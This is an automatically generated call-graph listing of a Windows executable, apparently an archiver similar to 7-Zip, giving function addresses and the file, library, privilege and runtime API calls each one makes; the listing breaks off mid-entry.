32994->32951 32996 4186e0 32995->32996 32997 4186f5 32996->32997 32998 4186e7 GetFileAttributesW 32996->32998 32999 418741 32997->32999 33000 41354c 2 API calls 32997->33000 32998->32997 32998->32999 32999->32878 32999->32889 33001 418703 33000->33001 33002 41b8b0 44 API calls 33001->33002 33003 418718 33002->33003 33004 418737 free 33003->33004 33005 41871c GetFileAttributesW free 33003->33005 33004->32999 33005->32999 33006->32909 33007->32913 33010->32905 33016 41b298 33011->33016 33013 41b8e0 33013->32974 33015 413730 4 API calls 33015->33013 33017 41b2cb 33016->33017 33018 41b2d2 33016->33018 33017->33013 33017->33015 33018->33017 33019 41b3d7 33018->33019 33026 41b300 33018->33026 33020 41b4cf 33019->33020 33022 41b3f0 33019->33022 33021 41b6b8 33020->33021 33023 41b4e5 33020->33023 33024 4135b8 3 API calls 33021->33024 33022->33023 33027 41b40d 33022->33027 33025 41354c 2 API calls 33023->33025 33035 41b6c6 33024->33035 33028 41b4ef 33025->33028 33026->33017 33029 4135b8 3 API calls 33026->33029 33030 4135b8 3 API calls 33027->33030 33107 417564 13 API calls 33028->33107 33032 41b32f 33029->33032 33033 41b41a 33030->33033 33041 41b343 free 33032->33041 33042 41b352 33032->33042 33038 4135b8 3 API calls 33033->33038 33034 41b4fa 33036 41b50f 33034->33036 33037 41b4fe free 33034->33037 33039 4135b8 3 API calls 33035->33039 33108 41ab6c _CxxThrowException 33036->33108 33037->33017 33043 41b446 33038->33043 33044 41b704 33039->33044 33041->33017 33046 4135b8 3 API calls 33042->33046 33105 41b04c memmove 33043->33105 33114 41b04c memmove 33044->33114 33045 41b519 33057 41b52f 33045->33057 33066 41b54e 33045->33066 33049 41b360 33046->33049 33104 41b04c memmove 33049->33104 33050 41b451 33053 41b471 33050->33053 33054 41b455 free free 33050->33054 33051 41b70f 33055 41b713 free free 33051->33055 33056 41b72c 33051->33056 33106 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33053->33106 33054->33017 33055->33017 33115 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33056->33115 33065 41b557 33057->33065 33068 41b53f free 33057->33068 33058 41b36b 33059 41b38b 33058->33059 33060 41b36f free free 33058->33060 33067 4139ac 6 API calls 33059->33067 33060->33017 33063 41b480 33072 4139ac 6 API calls 33063->33072 33064 41b73b 33069 4139ac 6 API calls 33064->33069 33070 41354c 2 API calls 33065->33070 33066->33065 33075 41b6a9 free 33066->33075 33093 41b58a 33066->33093 33071 41b3ad 33067->33071 33068->33017 33073 41b75d 33069->33073 33074 41b5d8 33070->33074 33076 4139ac 6 API calls 33071->33076 33077 41b4a5 33072->33077 33078 4139ac 6 API calls 33073->33078 33079 41b60b 33074->33079 33083 41b5e5 33074->33083 33075->33017 33080 41b3ba free free 33076->33080 33081 4139ac 6 API calls 33077->33081 33082 41b76a free free 33078->33082 33084 413730 4 API calls 33079->33084 33080->33017 33085 41b4b2 free free 33081->33085 33082->33017 33109 413958 6 API calls 33083->33109 33088 41b609 33084->33088 33085->33017 33087 41b5b8 free 33087->33017 33111 41b04c memmove 33088->33111 33089 41b5fc 33110 413958 6 API calls 33089->33110 33092 41b623 33094 41b643 33092->33094 33095 41b627 free free 33092->33095 33093->33065 33093->33087 33096 41b653 33094->33096 33112 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33094->33112 33095->33017 33113 41ab0c malloc _CxxThrowException memmove 33096->33113 33099 41b668 33100 4139ac 6 API calls 33099->33100 33101 41b674 free 33100->33101 33102 4139ac 6 API calls 33101->33102 33103 41b68c free free 33102->33103 33103->33017 33104->33058 33105->33050 33106->33063 33107->33034 33108->33045 33109->33089 33110->33088 33111->33092 33112->33096 33113->33099 33114->33051 33115->33064 33123 419a94 33116->33123 33119 419f76 33135 419cd0 15 API calls 33119->33135 33120 419f56 SetFileTime 33120->33119 33122 418a38 33122->32984 33124 41960c CloseHandle 33123->33124 33126 419abf 33124->33126 33125 419ac5 33125->33119 33125->33120 33126->33125 33127 419aee CreateFileW 33126->33127 33128 419b12 33126->33128 33127->33128 33128->33125 33129 41354c 2 API calls 33128->33129 33130 419b26 33129->33130 33131 41b8b0 44 API calls 33130->33131 33132 419b3b 33131->33132 33133 419b65 free 33132->33133 33134 419b3f CreateFileW 33132->33134 33133->33125 33134->33133 33135->33122 33137 412350 2 API calls 33136->33137 33138 41329d memmove 33137->33138 33138->32868 33140 413280 2 API calls 33139->33140 33141 413498 memmove memmove 33140->33141 33141->32854 33142->32792 33309 416c8c 33143->33309 33146 413504 4 API calls 33147 4470ea 33146->33147 33316 4192d4 33147->33316 33149 4470ff 33150 44715d 33149->33150 33151 413504 4 API calls 33149->33151 33153 44717d 33150->33153 33154 44716f free 33150->33154 33152 447119 33151->33152 33155 4192d4 103 API calls 33152->33155 33156 447191 33153->33156 33157 447183 free 33153->33157 33154->33153 33158 44712e 33155->33158 33159 447197 free 33156->33159 33160 4471a1 33156->33160 33157->33156 33158->33150 33163 413504 4 API calls 33158->33163 33159->33160 33161 4472d3 33160->33161 33162 41354c 2 API calls 33160->33162 33164 4136a8 3 API calls 33161->33164 33165 4471b4 33162->33165 33166 447148 33163->33166 33167 4472e0 free 33164->33167 33321 446f74 112 API calls 33165->33321 33169 4192d4 103 API calls 33166->33169 33170 4472ee 33167->33170 33169->33150 33194 413504 33170->33194 33171 4471d0 33172 4471d4 33171->33172 33173 4471ff 33171->33173 33174 4136a8 3 API calls 33172->33174 33322 446f74 112 API calls 33173->33322 33176 4471e1 free free 33174->33176 33176->33170 33177 44721a 33178 44721e 33177->33178 33179 447249 33177->33179 33181 4136a8 3 API calls 33178->33181 33323 446f74 112 API calls 33179->33323 33183 44722b free free 33181->33183 33182 44725d 33184 447261 33182->33184 33185 447289 33182->33185 33183->33170 33186 4136a8 3 API calls 33184->33186 33324 446f74 112 API calls 33185->33324 33188 44726e free free 33186->33188 33188->33170 33189 44729d 33190 4472a1 33189->33190 33191 4472c9 free 33189->33191 33192 4136a8 3 API calls 33190->33192 33191->33161 33193 4472ae free free 33192->33193 33193->33170 33195 41351c 33194->33195 33196 413470 4 API calls 33195->33196 33197 413542 33196->33197 33198 4493b8 33197->33198 33199 4493de 33198->33199 33200 449479 33199->33200 33406 416bac FreeLibrary LoadLibraryExW 33199->33406 33334 455a44 33200->33334 33204 44940d 33206 449411 GetLastError 33204->33206 33207 44946c 33204->33207 33205 412350 2 API calls 33208 44948c 33205->33208 33209 449420 33206->33209 33210 449447 33206->33210 33211 416b80 FreeLibrary 33207->33211 33212 4494a1 33208->33212 33412 447c28 malloc _CxxThrowException 33208->33412 33407 4484d8 malloc _CxxThrowException _CxxThrowException memmove free 33209->33407 33409 416b80 33210->33409 33211->33200 33218 413798 4 API calls 33212->33218 33216 449429 33217 413798 4 API calls 33216->33217 33219 449437 33217->33219 33220 4494d3 33218->33220 33408 412e68 malloc _CxxThrowException free 33219->33408 33343 416bf0 33220->33343 33224 449607 33416 448b28 8 API calls 33224->33416 33225 4494ea 33348 4476d4 GetProcAddress 33225->33348 33229 4494f6 33413 4484d8 malloc _CxxThrowException _CxxThrowException memmove free 33229->33413 33230 449522 33236 449550 33230->33236 33237 449538 GetProcAddress 33230->33237 33231 44951d 33232 449465 free 33231->33232 33234 449640 free 33231->33234 33232->32515 33232->32537 33239 416b80 FreeLibrary 33234->33239 33235 4494ff 33238 413798 4 API calls 33235->33238 33241 44957c GetProcAddress 33236->33241 33242 449559 GetProcAddress 33236->33242 33237->33236 33240 44954e 33237->33240 33244 44950d 33238->33244 33245 449652 free 33239->33245 33240->33236 33357 4488b0 GetProcAddress GetProcAddress GetProcAddress 33241->33357 33242->33241 33246 44956f 33242->33246 33414 412e68 malloc _CxxThrowException free 33244->33414 33245->33232 33246->33241 33251 4495f3 33253 413798 4 API calls 33251->33253 33252 4495d3 33252->33231 33415 4484d8 malloc _CxxThrowException _CxxThrowException memmove free 33252->33415 33253->33231 33438 41921c 33254->33438 33256 44971f 33257 449723 free 33256->33257 33258 4136a8 3 API calls 33256->33258 33257->32526 33257->32537 33259 449737 33258->33259 33260 44974c 33259->33260 33444 4132b0 _CxxThrowException 33259->33444 33261 41354c 2 API calls 33260->33261 33263 44977c 33261->33263 33445 4187cc malloc _CxxThrowException _CxxThrowException free memmove 33263->33445 33265 44978c 33266 41354c 2 API calls 33265->33266 33267 4497a0 33266->33267 33446 418858 50 API calls 33267->33446 33269 449828 33448 448b28 8 API calls 33269->33448 33271 449834 free free 33273 4182ec FindClose 33271->33273 33272 449833 33272->33271 33276 449853 free 33273->33276 33274 4497b8 33274->33269 33274->33271 33277 4134d0 4 API calls 33274->33277 33278 4493b8 88 API calls 33274->33278 33447 418858 50 API calls 33274->33447 33276->33257 33277->33274 33279 4497fa free 33278->33279 33279->33274 33280 449862 free free 33279->33280 33281 4182ec FindClose 33280->33281 33282 449881 free 33281->33282 33282->33257 33284 4417c8 free 33283->33284 33285 44179b 33283->33285 33286 441812 free 33284->33286 33287 4417dc 33284->33287 33285->33284 33288 4417b3 free free 33285->33288 33287->33286 33289 4417f4 free free free 33287->33289 33288->33285 33289->33287 33449 414040 33290->33449 33293 414040 10 API calls 33294 4485e6 33293->33294 33298 44868d 33294->33298 33299 41354c malloc _CxxThrowException 33294->33299 33302 413798 4 API calls 33294->33302 33303 413798 4 API calls 33294->33303 33468 448374 6 API calls 33294->33468 33295 4486c6 free 33296 4486dd 33295->33296 33297 44870a free 33295->33297 33296->33297 33301 4486f6 free free 33296->33301 33297->32525 33298->33295 33300 4486b2 free free 33298->33300 33299->33294 33300->33298 33301->33296 33302->33294 33305 448636 wcscmp 33303->33305 33305->33294 33306 448668 free free 33306->33294 33306->33298 33307->32534 33308->32534 33310 41354c 2 API calls 33309->33310 33311 416caf 33310->33311 33325 416c28 GetModuleFileNameW 33311->33325 33313 416cf9 33313->33146 33314 416cbf 33314->33313 33329 4138a8 33314->33329 33317 41354c 2 API calls 33316->33317 33318 41931b 33317->33318 33319 4188ec 102 API calls 33318->33319 33320 41932c free 33319->33320 33320->33149 33321->33171 33322->33177 33323->33182 33324->33189 33326 416c69 33325->33326 33327 416c7a 33325->33327 33326->33327 33328 413730 4 API calls 33326->33328 33327->33314 33328->33327 33330 4138be 33329->33330 33331 412350 2 API calls 33330->33331 33333 4138eb 33330->33333 33332 4138da free 33331->33332 33332->33333 33333->33313 33333->33333 33335 455a57 33334->33335 33336 449482 33334->33336 33337 455a60 _CxxThrowException 33335->33337 33338 455a7a 33335->33338 33336->33205 33337->33338 33339 412350 2 API calls 33338->33339 33340 455a96 33339->33340 33341 455ab2 free 33340->33341 33342 455a9f memmove 33340->33342 33341->33336 33342->33341 33344 416b80 FreeLibrary 33343->33344 33345 416c03 33344->33345 33346 416c09 33345->33346 33347 416c0d LoadLibraryExW 33345->33347 33346->33224 33346->33225 33347->33346 33350 447706 33348->33350 33356 447742 33348->33356 33349 44772d 33351 41be6c VariantClear 33349->33351 33350->33349 33352 447738 33350->33352 33354 447750 33351->33354 33417 41be6c 33352->33417 33355 41be6c VariantClear 33354->33355 33355->33356 33356->33229 33356->33230 33358 448920 GetProcAddress 33357->33358 33359 448a81 GetProcAddress 33357->33359 33362 448941 33358->33362 33360 448afa 33359->33360 33364 448a97 33359->33364 33368 448a78 33360->33368 33361 4473c4 VariantClear SysStringByteLen 33361->33362 33362->33359 33362->33361 33365 448a6e 33362->33365 33367 41be6c VariantClear 33362->33367 33362->33368 33421 447ddc 33362->33421 33363 455a44 5 API calls 33363->33364 33364->33360 33364->33363 33364->33368 33366 41be6c VariantClear 33365->33366 33366->33368 33367->33362 33368->33231 33368->33252 33371 448cbc GetProcAddress GetProcAddress 33368->33371 33372 448d27 GetProcAddress 33371->33372 33373 448d50 GetProcAddress 33371->33373 33374 448d3c 33372->33374 33399 448d6f 33372->33399 33375 448d4b 33373->33375 33373->33399 33374->33375 33374->33399 33376 4491df 33375->33376 33376->33252 33377 41354c malloc _CxxThrowException 33377->33399 33378 4491e4 33379 441784 7 API calls 33378->33379 33379->33376 33380 448eb3 SysStringByteLen 33381 4491e9 33380->33381 33380->33399 33383 41be6c VariantClear 33381->33383 33383->33378 33384 441784 7 API calls 33384->33399 33385 41be6c VariantClear 33385->33399 33386 44760c malloc _CxxThrowException SysStringLen free VariantClear 33386->33399 33387 4491fe free free 33387->33378 33388 449219 free free 33388->33378 33389 448580 21 API calls 33389->33399 33390 449234 free free 33390->33378 33391 447544 VariantClear 33391->33399 33392 44748c VariantClear 33392->33399 33393 44924f free free 33393->33378 33394 449267 free free free 33394->33378 33395 447eb0 7 API calls 33395->33399 33396 44928a free free free 33396->33378 33399->33376 33399->33377 33399->33378 33399->33380 33399->33384 33399->33385 33399->33386 33399->33387 33399->33388 33399->33389 33399->33390 33399->33391 33399->33392 33399->33393 33399->33394 33399->33395 33399->33396 33400 4492ad free free free 33399->33400 33401 455a44 malloc _CxxThrowException _CxxThrowException memmove free 33399->33401 33402 412350 2 API calls 33399->33402 33403 449191 free free free 33399->33403 33430 41bf00 33399->33430 33434 43fe74 malloc _CxxThrowException memmove 33399->33434 33435 448798 9 API calls 33399->33435 33436 4418a8 malloc _CxxThrowException memmove memmove 33399->33436 33400->33378 33401->33399 33402->33399 33405 441784 7 API calls 33403->33405 33405->33399 33406->33204 33407->33216 33408->33210 33410 416b91 FreeLibrary 33409->33410 33411 416b9b 33409->33411 33410->33411 33411->33232 33412->33212 33413->33235 33414->33231 33415->33251 33416->33231 33418 41be97 33417->33418 33420 41be78 33417->33420 33418->33356 33419 41be91 VariantClear 33419->33418 33420->33418 33420->33419 33422 447def 33421->33422 33423 447e58 memmove 33421->33423 33424 447e12 33422->33424 33425 447df8 _CxxThrowException 33422->33425 33423->33359 33423->33362 33426 412350 2 API calls 33424->33426 33425->33424 33427 447e2e 33426->33427 33428 447e37 memmove 33427->33428 33429 447e4a free 33427->33429 33428->33429 33429->33423 33431 41bf14 33430->33431 33432 41bf0a 33430->33432 33437 41be9c VariantClear 33431->33437 33432->33399 33434->33399 33435->33399 33436->33399 33437->33432 33439 41354c 2 API calls 33438->33439 33440 41927e 33439->33440 33441 4188ec 102 API calls 33440->33441 33442 41928f free 33441->33442 33442->33256 33445->33265 33446->33274 33447->33274 33448->33272 33450 414097 33449->33450 33451 41406b 33449->33451 33452 4141b7 33450->33452 33454 41354c 2 API calls 33450->33454 33451->33450 33453 414082 free free 33451->33453 33452->33293 33453->33451 33465 4140b0 33454->33465 33455 414161 33456 4141af free 33455->33456 33457 455a44 5 API calls 33455->33457 33456->33452 33458 414178 33457->33458 33461 412350 2 API calls 33458->33461 33460 455a44 5 API calls 33460->33465 33463 414182 33461->33463 33462 412350 2 API calls 33462->33465 33464 41419c 33463->33464 33466 4136a8 3 API calls 33463->33466 33464->33456 33465->33455 33465->33460 33465->33462 33467 4136a8 3 API calls 33465->33467 33469 4132b0 _CxxThrowException 33465->33469 33466->33464 33467->33465 33468->33306 33470->32565 33471->32577 33472->32577 33473->32592 33474->32592 33476 412350 2 API calls 33475->33476 33477 412dd2 33476->33477 33477->32605 33479 412350 2 API calls 33478->33479 33480 41da69 33479->33480 33483->32654 33484->32633 33488 412ccc 33485->33488 33489 412350 2 API calls 33488->33489 33490 412ce8 33489->33490 33490->32633 33505 412515 33504->33505 33506 412508 33504->33506 33511 414544 9 API calls 33505->33511 33510 414d00 malloc _CxxThrowException _CxxThrowException free _CxxThrowException 33506->33510 33509 412513 fputs free free 33509->32199 33510->33509 33511->33509 33513 413352 memmove 33512->33513 33514 413315 33512->33514 33513->32239 33515 413357 _CxxThrowException 33514->33515 33516 41334b 33514->33516 33518 4131d8 malloc _CxxThrowException memmove free 33516->33518 33518->33513 33519 46e286 33520 46e29d __set_app_type 33519->33520 33521 46e2e1 33520->33521 33522 46e2f7 _initterm __getmainargs _initterm 33521->33522 33523 46e2ea __setusermatherr 33521->33523 33524 46e371 33522->33524 33523->33522 33525 46e383 33524->33525 33526 46e37b _cexit 33524->33526 33526->33525 33527 41eae0 33528 41eafd 33527->33528 33530 41eaf3 33527->33530 33528->33530 33533 4196f8 33528->33533 33532 41eb63 GetLastError 33532->33530 33534 419720 SetFilePointer 33533->33534 33535 41970d 33533->33535 33536 419743 GetLastError 33534->33536 33537 419766 33534->33537 33535->33534 33536->33537 33538 41974f 33536->33538 33537->33530 33537->33532 33541 41969c SetFilePointer GetLastError 33538->33541 33540 41975a SetLastError 33540->33537 33541->33540 33542 41f3a0 33543 41f3c1 33542->33543 33544 41f3b2 33542->33544 33547 41e8c4 33544->33547 33550 46d8a0 VirtualFree 33547->33550 33549 41e919 33550->33549 33551 423760 33605 411648 33551->33605 33554 4237ca _isatty _isatty _isatty 33556 42381d 33554->33556 33563 423892 33556->33563 33627 422c88 9 API calls 33556->33627 33557 4237b8 _CxxThrowException 33557->33554 33559 42387a 33628 412ecc 33559->33628 33561 423887 free 33561->33563 33562 423934 33620 41bd0c GetCurrentProcess OpenProcessToken 33562->33620 33563->33562 33633 4386a8 7 API calls 33563->33633 33566 41bd0c 6 API calls 33568 4239c7 33566->33568 33570 423a72 33568->33570 33572 4239f2 33568->33572 33573 4239f9 wcscmp 33568->33573 33569 423969 _CxxThrowException 33569->33562 33571 423b97 33570->33571 33575 412db8 2 API calls 33570->33575 33635 41bda4 GetModuleHandleW GetProcAddress 33572->33635 33573->33572 33574 423a0e 33573->33574 33574->33572 33579 423a23 33574->33579 33577 423aa0 33575->33577 33637 412f28 malloc _CxxThrowException free 33577->33637 33578 423a55 33578->33570 33636 46d8c0 GetModuleHandleW GetProcAddress 33578->33636 33634 4386a8 7 API calls 33579->33634 33582 423aae 33638 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33582->33638 33584 423a37 _CxxThrowException 33584->33572 33586 423a5e 33587 41bd0c 6 API calls 33586->33587 33588 423a6c 33587->33588 33588->33570 33589 423abd 33590 423b19 33589->33590 33639 4386a8 7 API calls 33589->33639 33640 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33590->33640 33592 423b07 _CxxThrowException 33592->33590 33594 423b33 GetCurrentProcess SetProcessAffinityMask 33595 423b84 33594->33595 33596 423b4a GetLastError 33594->33596 33643 413920 _CxxThrowException 33595->33643 33641 4139f0 malloc _CxxThrowException memmove free _CxxThrowException 33596->33641 33599 423b61 33642 416d34 10 API calls 33599->33642 33600 423b8c free 33600->33571 33602 423b6d 33603 4139ac 6 API calls 33602->33603 33604 423b79 free 33603->33604 33604->33595 33606 4116cb 33605->33606 33607 41169f 33605->33607 33608 411701 33606->33608 33611 4116f9 free 33606->33611 33607->33606 33609 4116b7 free free 33607->33609 33610 412350 2 API calls 33608->33610 33609->33607 33617 411719 33610->33617 33611->33608 33612 411805 33612->33554 33626 4386a8 7 API calls 33612->33626 33613 455a44 5 API calls 33613->33617 33614 412350 2 API calls 33614->33617 33615 4136a8 3 API calls 33615->33617 33617->33612 33617->33613 33617->33614 33617->33615 33618 411807 33617->33618 33644 41138c 9 API calls 33617->33644 33619 413798 4 API calls 33618->33619 33619->33612 33621 41bd37 LookupPrivilegeValueW 33620->33621 33622 41bd98 33620->33622 33623 41bd4b AdjustTokenPrivileges 33621->33623 33624 41bd8d CloseHandle 33621->33624 33622->33566 33623->33624 33625 41bd82 GetLastError 33623->33625 33624->33622 33625->33624 33626->33557 33627->33559 33629 412ee0 33628->33629 33631 412f02 33628->33631 33630 412350 2 API calls 33629->33630 33629->33631 33632 412ef1 free 33630->33632 33631->33561 33631->33631 33632->33631 33633->33569 33634->33584 33635->33578 33636->33586 33637->33582 33638->33589 33639->33592 33640->33594 33641->33599 33642->33602 33643->33600 33644->33617 33645 41ef28 33650 419900 33645->33650 33648 41ef58 GetLastError 33649 41ef65 33648->33649 33652 41991c 33650->33652 33653 41994f 33652->33653 33654 4198b8 WriteFile 33652->33654 33653->33648 33653->33649 33654->33652 33655 428a08 33656 428a2c 33655->33656 33659 428a6d 33655->33659 33692 44b2cc 33656->33692 33667 428830 33659->33667 33660 428b99 33661 44b2cc VariantClear 33660->33661 33662 428bb9 33660->33662 33661->33662 33665 428a46 33662->33665 33688 427b1c 33662->33688 33663 428ad3 33663->33660 33663->33665 33666 428b6a SetFileSecurityW 33663->33666 33666->33660 33668 41354c 2 API calls 33667->33668 33669 42886f 33668->33669 33671 4288d4 33669->33671 33673 42889b 33669->33673 33681 4288d0 33669->33681 33729 426e88 14 API calls 33671->33729 33727 4264e8 25 API calls 33673->33727 33675 42893d 33677 4289d2 free 33675->33677 33676 4288b3 33676->33681 33728 426e88 14 API calls 33676->33728 33677->33663 33680 42895b 33730 417474 56 API calls 33680->33730 33702 427924 33681->33702 33683 428967 33684 428981 33683->33684 33731 426e88 14 API calls 33683->33731 33687 428985 33684->33687 33732 4282c8 218 API calls 33684->33732 33687->33675 33687->33677 33689 427b76 33688->33689 33690 427b2c 33688->33690 33689->33665 33690->33689 33748 426e88 14 API calls 33690->33748 33693 44b319 33692->33693 33694 44b385 33693->33694 33697 44b32a 33693->33697 33701 44b31f 33693->33701 33695 41be6c VariantClear 33694->33695 33699 44b34b 33695->33699 33696 44b34f 33700 41be6c VariantClear 33696->33700 33697->33696 33697->33701 33698 41be6c VariantClear 33698->33699 33699->33665 33700->33699 33701->33698 33703 427949 33702->33703 33718 427942 33702->33718 33707 42798e 33703->33707 33739 4199cc 33703->33739 33706 4279d2 33709 413504 4 API calls 33706->33709 33710 427a4d 33706->33710 33707->33706 33707->33710 33745 425f8c 6 API calls 33707->33745 33712 4279ee 33709->33712 33711 427aa8 33710->33711 33733 419878 SetFileTime 33710->33733 33734 41eee4 33711->33734 33746 41a030 48 API calls 33712->33746 33717 427a0f 33719 427a13 33717->33719 33720 427a1f 33717->33720 33718->33675 33718->33680 33721 41960c CloseHandle 33719->33721 33747 419960 WriteFile 33720->33747 33723 427a1d free 33721->33723 33723->33710 33724 427a37 33726 41960c CloseHandle 33724->33726 33726->33723 33727->33676 33728->33681 33729->33681 33730->33683 33731->33684 33732->33687 33733->33711 33735 41960c CloseHandle 33734->33735 33736 41eef3 33735->33736 33737 41eef9 GetLastError 33736->33737 33738 41ef06 33736->33738 33737->33738 33738->33718 33740 4196f8 5 API calls 33739->33740 33741 4199e7 33740->33741 33742 4199f4 33741->33742 33743 4199f8 SetEndOfFile 33741->33743 33742->33707 33744 426e88 14 API calls 33742->33744 33743->33742 33744->33707 33745->33706 33746->33717 33747->33724 33748->33689 33749 44d9ee 33751 44d9f4 33749->33751 33788 415110 33751->33788 33753 41354c 2 API calls 33755 44daa4 33753->33755 33754 44dad4 33757 412350 2 API calls 33754->33757 33758 44db1a 33754->33758 33755->33754 33756 413730 4 API calls 33755->33756 33756->33754 33757->33758 33792 438ad8 33758->33792 33760 44e4ac 33761 412350 2 API calls 33760->33761 33783 44e4da 33760->33783 33761->33783 33762 44e9e4 free free free free 33766 45182e free 33762->33766 33763 44db98 33763->33760 33765 44e48a free free free 33763->33765 33765->33766 33767 4523f7 33766->33767 33769 44e9f0 free free free free 33769->33766 33770 44ea46 free free free free 33770->33766 33771 44ea1b free free free free 33771->33766 33773 44ea85 free free free free 33773->33766 33776 44eaca free free free free 33776->33766 33778 44eb4e free free free free 33778->33766 33780 413798 malloc _CxxThrowException free memmove 33780->33783 33781 44eb90 free free free free 33781->33766 33783->33762 33783->33769 33783->33770 33783->33771 33783->33773 33783->33776 33783->33778 33783->33780 33783->33781 33785 44ebcf free free free free 33783->33785 33786 44eb09 free free free free 33783->33786 33801 44c940 33783->33801 33805 44a408 6 API calls 33783->33805 33785->33766 33786->33766 33789 41512d 33788->33789 33790 4135b8 3 API calls 33789->33790 33791 415140 33790->33791 33791->33753 33793 438b54 33792->33793 33794 438aeb 33792->33794 33793->33763 33795 438af4 _CxxThrowException 33794->33795 33796 438b0e 33794->33796 33795->33796 33797 412350 2 API calls 33796->33797 33798 438b2a 33797->33798 33799 438b33 memmove 33798->33799 33800 438b46 free 33798->33800 33799->33800 33800->33793 33804 44c968 33801->33804 33802 44c978 33802->33783 33804->33802 33806 454c98 19 API calls 33804->33806 33805->33783 33806->33802 33807 42b64c 33808 42b689 33807->33808 33850 42649c 33808->33850 33811 42b7da 33814 42b7fd 33811->33814 33815 42b7e9 33811->33815 33812 42b7c9 33813 41be6c VariantClear 33812->33813 33849 42b7d3 33813->33849 33816 41be6c VariantClear 33814->33816 33817 41be6c VariantClear 33815->33817 33818 42b817 33816->33818 33817->33849 33884 42a24c 33818->33884 33823 44b2cc VariantClear 33825 42b862 33823->33825 33824 42b89d 33827 42b8bd 33824->33827 33841 42b908 33824->33841 33824->33849 33825->33824 33825->33849 34067 42a024 29 API calls 33825->34067 33830 42b8fb 33827->33830 34068 428db8 free free memmove 33827->34068 33828 42bab6 33834 412350 2 API calls 33828->33834 33842 42bac9 33828->33842 33830->33828 33832 42bbed 33830->33832 33836 42bc14 33832->33836 33837 42bc58 33832->33837 33832->33849 33834->33842 33835 42b938 33835->33849 34070 428db8 free free memmove 33835->34070 33838 412350 2 API calls 33836->33838 33939 42ac94 33837->33939 33838->33849 33840 42bba0 free 33840->33849 33841->33835 33841->33849 34069 414ee4 CharUpperW CharUpperW 33841->34069 34071 43efc0 33842->34071 33845 42bb74 33848 4139ac 6 API calls 33845->33848 33848->33840 33853 4264ac 33850->33853 33851 44d50a 33852 44a074 VariantClear 33851->33852 33854 44d52f 33852->33854 33853->33851 33855 44d4f3 free free 33853->33855 33856 42b795 33854->33856 34078 44c8e4 15 API calls 33854->34078 33855->33853 33856->33811 33856->33812 33856->33849 33858 44d54f 33858->33856 33859 413798 4 API calls 33858->33859 33860 44d563 33859->33860 33861 44a074 VariantClear 33860->33861 33872 44d580 33860->33872 33861->33872 33862 44d6c1 33867 413730 4 API calls 33862->33867 33868 44d6ff 33862->33868 33863 44d731 34081 44d19c 21 API calls 33863->34081 33864 44d7fb 34082 415a4c 11 API calls 33864->34082 33867->33868 33868->33863 33868->33864 33869 44d614 33871 41be6c VariantClear 33869->33871 33870 44d637 33870->33869 33875 44d65a 33870->33875 34080 44c8e4 15 API calls 33870->34080 33871->33856 33872->33856 33872->33862 33872->33869 33872->33870 34079 413850 malloc _CxxThrowException SysStringLen free 33872->34079 33873 44d743 33873->33856 33877 413730 4 API calls 33873->33877 33880 44d794 33873->33880 33881 41be6c VariantClear 33875->33881 33877->33880 33878 44d7e5 free free 33878->33856 33879 44d67f 33879->33869 33882 44a074 VariantClear 33879->33882 33880->33856 33880->33878 33881->33862 33883 44d6a0 33882->33883 33883->33869 33883->33875 33885 42a2c9 33884->33885 33886 42a2d0 33885->33886 33887 42a2fe 33885->33887 33888 42a2dd 33885->33888 33890 41be6c VariantClear 33886->33890 33887->33886 33889 42a2fc 33887->33889 34083 413850 malloc _CxxThrowException SysStringLen free 33888->34083 33893 41be6c VariantClear 33889->33893 33892 42a313 33890->33892 33892->33849 33935 44a074 33892->33935 33894 42a324 33893->33894 33895 42a352 33894->33895 33896 42a380 33894->33896 33897 42a35f 33894->33897 33898 41be6c VariantClear 33895->33898 33896->33895 33900 42a37e 33896->33900 34084 413850 malloc _CxxThrowException SysStringLen free 33897->34084 33898->33892 33901 41be6c VariantClear 33900->33901 33902 42a3a6 33901->33902 33902->33892 33903 42a544 33902->33903 33904 41354c 2 API calls 33902->33904 33903->33892 33909 42a599 33903->33909 34087 413cb8 memmove 33903->34087 33906 42a456 33904->33906 33907 41354c 2 API calls 33906->33907 33908 42a461 33907->33908 33911 412db8 2 API calls 33908->33911 33914 42a5d0 33909->33914 34088 413cb8 memmove 33909->34088 33912 42a46f 33911->33912 34085 41a0bc 6 API calls 33912->34085 33914->33892 34089 415a4c 11 API calls 33914->34089 33915 42a48a 33917 42a523 free free free 33915->33917 34086 41a2b4 13 API calls 33915->34086 33917->33903 33919 42a65b 34091 428db8 free free memmove 33919->34091 33921 42a4a9 33923 413798 4 API calls 33921->33923 33922 42a66b 33925 43efc0 7 API calls 33922->33925 33926 42a4b9 free 33923->33926 33928 42a67a 33925->33928 33929 42a4df 33926->33929 33927 42a61a 33927->33919 33927->33922 34090 414ee4 CharUpperW CharUpperW 33927->34090 33930 413798 4 API calls 33928->33930 33929->33917 33931 42a68a free 33930->33931 33932 42a6d1 free 33931->33932 33933 42a6a3 33931->33933 33932->33892 33933->33932 33934 42a6bc free free 33933->33934 33934->33933 33936 44a0a4 33935->33936 33937 41be6c VariantClear 33936->33937 33938 42b840 33937->33938 33938->33823 33938->33849 34092 4270a4 33939->34092 33942 42b576 33942->33849 33943 44a074 VariantClear 33944 42acf8 33943->33944 33944->33942 34110 42a7e4 33944->34110 33947 43efc0 7 API calls 33948 42ad19 33947->33948 33949 42ad2b 33948->33949 34226 42a9fc 131 API calls 33948->34226 33951 4136a8 3 API calls 33949->33951 33952 42ad3a 33951->33952 33956 42ad7e 33952->33956 34227 426330 7 API calls 33952->34227 33954 42ad65 33955 413798 4 API calls 33954->33955 33957 42ad73 free 33955->33957 33958 42ae93 33956->33958 33961 41354c 2 API calls 33956->33961 33957->33956 33959 42aef3 33958->33959 33960 42ae9b 33958->33960 33962 42af35 33959->33962 34138 42728c 33959->34138 33963 413798 4 API calls 33960->33963 33982 42adae free 33961->33982 33965 413798 4 API calls 33962->33965 33964 42aeac 33963->33964 33967 42aec5 33964->33967 34230 417088 48 API calls 33964->34230 33968 42af4a 33965->33968 33967->33962 33971 42aed5 33967->33971 33972 42af53 free 33968->33972 33973 42af66 33968->33973 33979 42aee3 free 33971->33979 33985 427b1c 14 API calls 33971->33985 33980 42b56a free 33972->33980 33981 42af6e 33973->33981 33991 42afd9 33973->33991 33974 42af20 33974->33962 33977 42af25 free 33974->33977 33975 42af0e free 33975->33980 33977->33980 33978 42ae0c 33984 413798 4 API calls 33978->33984 33979->33980 33980->33942 34231 